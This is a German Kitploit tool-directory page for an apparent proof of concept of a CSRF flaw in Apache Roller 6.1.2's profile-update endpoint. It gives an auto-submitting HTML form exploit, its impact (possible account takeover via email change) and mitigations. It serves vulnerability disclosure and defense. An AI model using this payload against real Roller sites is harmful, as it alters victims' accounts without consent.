Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
roller-csrf — PoC-Exploit für eine CSRF-Schwachstelle im Profilaktualisierungs-Endpunkt von Apache Roller v6.1.2. Enthält HTML-Formular-Exploit-Code, um unbefugte Profiländerungen zu demonstrieren. | Kitploit
Tools/GitHubGitHub/vanlam2001/roller-csrf
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubvanlam2001/roller-csrf

roller-csrf

PoC-Exploit für eine CSRF-Schwachstelle im Profilaktualisierungs-Endpunkt von Apache Roller v6.1.2. Enthält HTML-Formular-Exploit-Code, um unbefugte Profiländerungen zu demonstrieren.

Repository anzeigen
3vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) bei der Profilaktualisierung

Details zur Schwachstelle

  • Version: v6.1.2
  • Datum: 2025-11-09
  • Exploit-Autor: Van Lam Nguyen
  • Facebook: https://www.facebook.com/vanlam1412
  • Anbieter-Homepage: https://roller.apache.org
  • Software-Link: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • Getestet auf: Windows
  • CVE: N/A
  • Demo: https://youtu.be/iPEiVzcpJJU

Übersicht

Es wurde festgestellt, dass Roller v6.1.2 und frühere Versionen eine Cross-Site Request Forgery (CSRF)-Schwachstelle im Endpunkt /roller/roller-ui/profile!save.rol enthalten.

Diese Schwachstelle ermöglicht es Angreifern, die Profilinformationen des Opfers (z. B. E-Mail, vollständiger Name, Gebietsschema, Zeitzone) über eine manipulierte HTML-Seite beliebig zu ändern.

Proof of Concept

Die Schwachstelle ermöglicht nicht autorisierte Anfragen an /roller/roller-ui/profile!save.rol, die das Benutzerprofil ohne CSRF-Schutz aktualisieren.

HTML-Exploit-Code

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

Formularparameter

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (leer)
  • bean.passwordConfirm: (leer)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

Auswirkungen

Ein Angreifer kann eine schädliche HTML-Seite erstellen, die, wenn sie von einem authentifizierten Roller-Benutzer besucht wird, automatisch ein Formular zum Aktualisieren der Profilinformationen des Opfers ohne dessen Zustimmung absendet. Dies kann zu Folgendem führen:

  • Nicht autorisierte Änderungen an Benutzerprofildaten
  • Mögliche Übernahme des Kontos, wenn die E-Mail-Adresse geändert wird
  • Beeinträchtigung der Benutzererfahrung durch Änderungen an Gebietsschema und Zeitzone

Behebung

  • Implementieren Sie CSRF-Tokens für alle zustandsändernden Anfragen
  • Validieren Sie die Origin- und Referer-Header
  • Verwenden Sie Same-Site-Cookies
  • Implementieren Sie geeignete Authentifizierungs- und Autorisierungsprüfungen
Tool herunterladen